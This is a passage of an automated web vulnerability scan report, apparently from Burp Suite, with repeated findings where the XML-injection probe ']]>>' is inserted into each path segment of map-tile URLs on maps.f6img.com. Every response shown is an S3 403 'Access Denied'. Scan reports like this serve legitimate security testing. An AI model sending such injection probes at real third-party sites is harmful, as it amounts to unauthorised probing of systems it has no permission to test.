X-Amz-Cf-Id: 4e25d5af4b2b1d0827d2656a2939c5e7b725d7606590262c8e38279d67f6adb59decc1bec9c2cde2
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CD2056B39ACDE483</RequestId><HostId>ePsmkPyOfmNZ10+JnQWgMe0BOebaX/5OweUx9qws6nVembppt1
...[SNIP]...

8.247. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4A947EC186FB6207
x-amz-id-2: 08G5jCn6zcj9NWWMrjTeV+RyaqgMhrLN3VL+d6Z3xAybnpHk4jsG+2U3gaF4oHNP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bcae26b2798b08d64a42db4eb38c4c199f215e177ef211d29ea45d6582850681e5dfe56175f483f4
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4A947EC186FB6207</RequestId><HostId>08G5jCn6zcj9NWWMrjTeV+RyaqgMhrLN3VL+d6Z3xAybnpHk4j
...[SNIP]...

8.248. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png]]>>?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 689DE2252E80DAA0
x-amz-id-2: c9dksLPMz+veNP8K8bwOdDD1ru5UTsVHVvo66XZ8DWTSanfW6U3Ck5iLLgJd/Gph
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e386ad49890f50d79b9adfe807d7a3ba1e2636dede173e934098ee1403f5d47da0b0e2b8c5c62093
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>689DE2252E80DAA0</RequestId><HostId>c9dksLPMz+veNP8K8bwOdDD1ru5UTsVHVvo66XZ8DWTSanfW6U
...[SNIP]...

8.249. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D96ADA01DCE10829
x-amz-id-2: NL9YPur0WCktV0QQjs6RkugsBRkvCpXmCaQfx0qfCo/6LfnFfTLMT9tIVxYaCPAS
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6f0df2eb784159afee8c88b200a80f2e652f27d3c6f66fed96ac597a65fc34c26668c32189d02cf1
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D96ADA01DCE10829</RequestId><HostId>NL9YPur0WCktV0QQjs6RkugsBRkvCpXmCaQfx0qfCo/6LfnFfT
...[SNIP]...

8.250. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4ADD0764AE047491
x-amz-id-2: 5O9mgXOr8zLhxYrOFZMwPBaCGa1YLqu73GjiY2u16L1iV5aQAD7hDd6gzXt7btU9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 92dc7dcd02b5fddc91d28c811261188ed841c594149add3488cae3dff6b87da203b732f6a0cfdc58
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4ADD0764AE047491</RequestId><HostId>5O9mgXOr8zLhxYrOFZMwPBaCGa1YLqu73GjiY2u16L1iV5aQAD
...[SNIP]...

8.251. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3EB8A69A8C092097
x-amz-id-2: SnoRvg6kwROygkbw0q/t7ReGzMg9CSXJwRuxH8GLe4zz99zW2cQGN40wtAhg9ENW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 997dc1defe4d92f71f8609d5c473141b15060e782c65d1f98713824db4b0b47de8d06823b1bc32a5
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3EB8A69A8C092097</RequestId><HostId>SnoRvg6kwROygkbw0q/t7ReGzMg9CSXJwRuxH8GLe4zz99zW2c
...[SNIP]...

8.252. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0A3E547B2B053A2F
x-amz-id-2: pjlVUh0aItBZZBHKeH9/EK0LLy94VAwlRo4rKaU9vjIRmbh7gol9TnX+w57M0vPC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 26ae88ad44315a93742a0b227bdd0808bc0ec9d7d250e47faef7dfbbc522ea69ca96be163ed88819
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0A3E547B2B053A2F</RequestId><HostId>pjlVUh0aItBZZBHKeH9/EK0LLy94VAwlRo4rKaU9vjIRmbh7go
...[SNIP]...

8.253. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 520BD1BA409D0929
x-amz-id-2: Qcg7YLsLZj52NKejiPt/IPM66Z5M+IyhUfxy2zjsoANjieBKJiNp6N3l+D9FJMhM
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 40142bb6a268161df57b3254c2d53fe6e8d98235d2488c06cf2caeb26d1f6ff7785d6f1acca3e1e6
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>520BD1BA409D0929</RequestId><HostId>Qcg7YLsLZj52NKejiPt/IPM66Z5M+IyhUfxy2zjsoANjieBKJi
...[SNIP]...

8.254. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CE71FD6D6319239
x-amz-id-2: lFzcQYKvtfawblN/JsbDjfA7l7JFkjh71l1bHICxHB7VVe64gC2fQGcOFoUzd6Px
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7c1d1f38a56e61ed9f1aa847a204ed57d074370508b804fbb8b2c1ae1fef8654c31f6f38f40a8275
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CE71FD6D6319239</RequestId><HostId>lFzcQYKvtfawblN/JsbDjfA7l7JFkjh71l1bHICxHB7VVe64gC
...[SNIP]...

8.255. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 56294351829D5DAC
x-amz-id-2: BN2bATG36ocD9SCk35OVmz2+W6mmVtseOkC9Kp1nFdfZ8KgqMTBd1RQ7bSrqbjnd
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2c3f8a79312cb756a9d6796cd28baab6db8617082222c3ed40567525716fd69591da230b94e4a72c
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>56294351829D5DAC</RequestId><HostId>BN2bATG36ocD9SCk35OVmz2+W6mmVtseOkC9Kp1nFdfZ8KgqMT
...[SNIP]...

8.256. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8949313642E9D16F
x-amz-id-2: K8lN6ufMJGG+TGqdV1uwLwKdM6K/OsaawE6hfB605CGOBM/5iEmcJU8WwVv8l+bl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 77d7ec5281b6f145d7455c2d3cc3fa7b687c3bdc2ee0b437347e4881d8e39dff39037a69f8f51f3d
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8949313642E9D16F</RequestId><HostId>K8lN6ufMJGG+TGqdV1uwLwKdM6K/OsaawE6hfB605CGOBM/5iE
...[SNIP]...

8.257. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03C5AE80C8944534
x-amz-id-2: e5uvTiqJSuWriFxfbQ68fwgYB7L5UOQOdxndyn0upAYM0YfnNKbdxfFKIfXHmTMk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c7626bc2f4081876c86cd2ac82cc9a831d657e07c4c031000c0bfe90cf9aee1a0730168ba39f8329
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03C5AE80C8944534</RequestId><HostId>e5uvTiqJSuWriFxfbQ68fwgYB7L5UOQOdxndyn0upAYM0YfnNK
...[SNIP]...

8.258. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 21460A8967ECCE79
x-amz-id-2: 4oegg91E5jEup2p8ZtmqloGE6ad3z5MTzNJ9JsVlOM2tW0BNhXygfD80q00ANE5S
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5557c92307fe3d6a5832c227b2342b5f454e907f56f4113f1cc7b7beef5171af33148d5fa05900a6
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>21460A8967ECCE79</RequestId><HostId>4oegg91E5jEup2p8ZtmqloGE6ad3z5MTzNJ9JsVlOM2tW0BNhX
...[SNIP]...

8.259. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FC6AD26B92C2128C
x-amz-id-2: 5tWpyEVGyUmc8nxPP91gWWCM8qdt3dm/X3voBvdXDBkkuxk2IOF+4/e4ZdHf4HHs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6d1b1958e8e72e408f801028367fa8af263d4834f08dd6fb0e9fa01876149e8433d875ec102a64b8
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FC6AD26B92C2128C</RequestId><HostId>5tWpyEVGyUmc8nxPP91gWWCM8qdt3dm/X3voBvdXDBkkuxk2IO
...[SNIP]...

8.260. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 829247D68E54C2B4
x-amz-id-2: kv/Wmlw3Z7twRuHREStDSOT2r/cRyt/JHeNIf/gToStkOjIOxhRYUgkm6jN8u3Fw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 92c50450fe9be584ae44f84b02b8e781c99b52f45fc309361553610a9cf833c70985295b97ffe62a
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>829247D68E54C2B4</RequestId><HostId>kv/Wmlw3Z7twRuHREStDSOT2r/cRyt/JHeNIf/gToStkOjIOxh
...[SNIP]...

8.261. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3474F07377C16569
x-amz-id-2: 9nPw0G9HE+3Lvc5tgBcchmCSpVMA7oF7xvWxe6FnlYl+pgRVy8XB9CHZ4zoxIV1U
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 53cc0f56b020c6c0fdaa005c5df58c361f0d206720ee3290d07168d98fa80ec4086aa8fc55c5e47a
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
